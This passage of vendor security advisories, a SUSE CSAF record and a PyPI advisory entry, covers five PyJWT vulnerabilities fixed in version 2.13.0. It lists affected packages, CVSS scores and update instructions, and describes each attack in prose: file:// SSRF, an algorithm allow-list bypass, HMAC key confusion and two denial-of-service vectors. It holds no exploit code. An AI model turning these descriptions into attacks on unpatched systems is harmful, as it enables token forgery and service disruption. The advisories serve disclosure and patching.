"product_id": "python313-PyJWT-2.13.0-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python314-PyJWT-2.13.0-1.1.s390x",
"product": {
"name": "python314-PyJWT-2.13.0-1.1.s390x",
"product_id": "python314-PyJWT-2.13.0-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-PyJWT-2.13.0-1.1.x86_64",
"product": {
"name": "python311-PyJWT-2.13.0-1.1.x86_64",
"product_id": "python311-PyJWT-2.13.0-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python313-PyJWT-2.13.0-1.1.x86_64",
"product": {
"name": "python313-PyJWT-2.13.0-1.1.x86_64",
"product_id": "python313-PyJWT-2.13.0-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python314-PyJWT-2.13.0-1.1.x86_64",
"product": {
"name": "python314-PyJWT-2.13.0-1.1.x86_64",
"product_id": "python314-PyJWT-2.13.0-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-PyJWT-2.13.0-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64"
},
"product_reference": "python311-PyJWT-2.13.0-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-PyJWT-2.13.0-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le"
},
"product_reference": "python311-PyJWT-2.13.0-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-PyJWT-2.13.0-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x"
},
"product_reference": "python311-PyJWT-2.13.0-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-PyJWT-2.13.0-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64"
},
"product_reference": "python311-PyJWT-2.13.0-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-PyJWT-2.13.0-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64"
},
"product_reference": "python313-PyJWT-2.13.0-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-PyJWT-2.13.0-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le"
},
"product_reference": "python313-PyJWT-2.13.0-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-PyJWT-2.13.0-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x"
},
"product_reference": "python313-PyJWT-2.13.0-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-PyJWT-2.13.0-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64"
},
"product_reference": "python313-PyJWT-2.13.0-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-PyJWT-2.13.0-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64"
},
"product_reference": "python314-PyJWT-2.13.0-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-PyJWT-2.13.0-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le"
},
"product_reference": "python314-PyJWT-2.13.0-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-PyJWT-2.13.0-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x"
},
"product_reference": "python314-PyJWT-2.13.0-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-PyJWT-2.13.0-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
},
"product_reference": "python314-PyJWT-2.13.0-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-48522",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-48522"
}
],
"notes": [
{
"category": "general",
"text": "PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient passes its uri argument directly to urllib.request.urlopen() which uses Python stdlib\u0027s default OpenerDirector registering HTTPHandler, HTTPSHandler, FTPHandler, FileHandler, and DataHandler. There is currently no documented option to restrict which schemes PyJWKClient will fetch. If an application\u0027s jku URL ingestion path accepts attacker-influenced URLs (e.g., from JWT header, configuration file, OAuth flow parameter), the attacker can cause PyJWKClient to read arbitrary local files via file:// (SSRF on local filesystem), cause PyJWKClient to attempt FTP / data-URI fetches (broader SSRF surface), or forge tokens that PyJWT verifies as valid. The library does not directly return non-HTTP(S) URI contents to the attacker; the chained \"plant a JWKS to forge tokens\" scenario described in the original report requires additional application-layer flaws (attacker write access to a filesystem path, untrusted jku derivation) that this fix does not address. This vulnerability is fixed in 2.13.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-48522",
"url": "https://www.suse.com/security/cve/CVE-2026-48522"
},
{
"category": "external",
"summary": "SUSE Bug 1266798 for CVE-2026-48522",
"url": "https://bugzilla.suse.com/1266798"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-13T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-48522"
},
{
"cve": "CVE-2026-48523",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-48523"
}
],
"notes": [
{
"category": "general",
"text": "PyJWT is a JSON Web Token implementation in Python. From 2.9.0 to 2.12.1, there is a verifier-side algorithm allow-list bypass when jwt.decode() or jwt.decode_complete() are called with a PyJWK key. The token header alg is checked against the caller-supplied algorithms allow-list, but signature verification is performed with the algorithm bound to the PyJWK object instead of the header algorithm. An attacker who controls a registered JWK/JWKS private key can sign with a disallowed algorithm, advertise an allowed algorithm in the JWT header, and still be accepted. The issue affects the documented PyJWKClient.get_signing_key_from_jwt(...) flow. This vulnerability is fixed in 2.13.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-48523",
"url": "https://www.suse.com/security/cve/CVE-2026-48523"
},
{
"category": "external",
"summary": "SUSE Bug 1266799 for CVE-2026-48523",
"url": "https://bugzilla.suse.com/1266799"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-13T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-48523"
},
{
"cve": "CVE-2026-48524",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-48524"
}
],
"notes": [
{
"category": "general",
"text": "PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient.get_signing_key() forces a fresh HTTP request to the JWKS endpoint for every JWT with an unknown kid value, with no rate limiting. Since kid comes from the unverified token header, an attacker can trigger unlimited outbound requests. The vulnerability surfaces only when a JWKS fetch fails; an attacker can attempt to provoke that with sustained unknown-kid traffic, but the outcome depends on upstream JWKS-endpoint behavior (rate limiting, transient errors) which is beyond the attacker\u0027s control. This vulnerability is fixed in 2.13.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-48524",
"url": "https://www.suse.com/security/cve/CVE-2026-48524"
},
{
"category": "external",
"summary": "SUSE Bug 1266800 for CVE-2026-48524",
"url": "https://bugzilla.suse.com/1266800"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.7,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-13T00:00:00Z",
"details": "low"
}
],
"title": "CVE-2026-48524"
},
{
"cve": "CVE-2026-48525",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-48525"
}
],
"notes": [
{
"category": "general",
"text": "PyJWT is a JSON Web Token implementation in Python. From 2.8.0 to 2.12.1, when verifying detached JWS tokens using the unencoded-payload option (\"b64\": false, RFC 7797), PyJWT performs Base64URL decoding of the compact-serialization payload segment before enforcing the detached-payload rules. For b64=false, PyJWT later discards that decoded payload and replaces it with the caller-provided detached_payload. In practice, this turns the middle segment into an attacker-controlled \u201cwork amplifier\u201d: a remote client can supply an arbitrarily large Base64URL payload segment that forces CPU work + memory allocations even if the signature is invalid. This creates an unauthenticated DoS vector against any endpoint that verifies detached JWS using PyJWT. This vulnerability is fixed in 2.13.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-48525",
"url": "https://www.suse.com/security/cve/CVE-2026-48525"
},
{
"category": "external",
"summary": "SUSE Bug 1266801 for CVE-2026-48525",
"url": "https://bugzilla.suse.com/1266801"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-13T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-48525"
},
{
"cve": "CVE-2026-48526",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-48526"
}
],
"notes": [
{
"category": "general",
"text": "PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, when the verifier is decoding JSON Web Tokens, while supporting both asymmetric and HMAC algorithms, the library does not validate use of JSON Web Keys in HMAC algorithm, allowing attacker to use the issuer public key as the secret key for HMAC algorithm. This vulnerability is fixed in 2.13.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-48526",
"url": "https://www.suse.com/security/cve/CVE-2026-48526"
},
{
"category": "external",
"summary": "SUSE Bug 1266802 for CVE-2026-48526",
"url": "https://bugzilla.suse.com/1266802"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.4,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-13T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-48526"
}
]
}
PYSEC-2026-179
Vulnerability from pysec - Published: 2026-05-28 16:16 - Updated: 2026-06-02 10:34PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, when the verifier is decoding JSON Web Tokens, while supporting both asymmetric and HMAC algorithms, the library does not validate use of JSON Web Keys in HMAC algorithm, allowing attacker to use the issuer public key as the secret key for HMAC algorithm. This vulnerability is fixed in 2.13.0.
| Name | purl | pyjwt | pkg:pypi/pyjwt |
|---|
{
"affected": [
{
"ecosystem_specific": {},
"package": {
"ecosystem": "PyPI",
"name": "pyjwt",
"purl": "pkg:pypi/pyjwt"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.13.0"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"0.1.1",
"0.1.2",
"0.1.3",
"0.1.4",
"0.1.5",
"0.1.6",
"0.1.7",
"0.1.8",
"0.1.9",
"0.2.0",
"0.2.1",
"0.2.3",
"0.3.0",
"0.3.1",
"0.3.2",
"0.4.0",
"0.4.1",
"0.4.2",
"0.4.3",
"1.0.0",
"1.0.1",
"1.1.0",
"1.3.0",
"1.4.0",
"1.4.1",
"1.4.2",
"1.5.0",
"1.5.1",
"1.5.2",
"1.5.3",
"1.6.0",
"1.6.1",
"1.6.3",
"1.6.4",
"1.7.0",
"1.7.1",
"2.0.0",
"2.0.0a1",
"2.0.0a2",
"2.0.1",
"2.1.0",
"2.10.0",
"2.10.1",
"2.11.0",
"2.12.0",
"2.12.1",
"2.2.0",
"2.3.0",
"2.4.0",
"2.5.0",
"2.6.0",
"2.7.0",
"2.8.0",
"2.9.0"
]
}
],
"aliases": [
"CVE-2026-48526",
"GHSA-xgmm-8j9v-c9wx"
],
"details": "PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, when the verifier is decoding JSON Web Tokens, while supporting both asymmetric and HMAC algorithms, the library does not validate use of JSON Web Keys in HMAC algorithm, allowing attacker to use the issuer public key as the secret key for HMAC algorithm. This vulnerability is fixed in 2.13.0.",
"id": "PYSEC-2026-179",
"modified": "2026-06-02T10:34:21.268376Z",
"published": "2026-05-28T16:16:29.657Z",
"references": [
{
"type": "EVIDENCE",
"url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx"
}
],
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
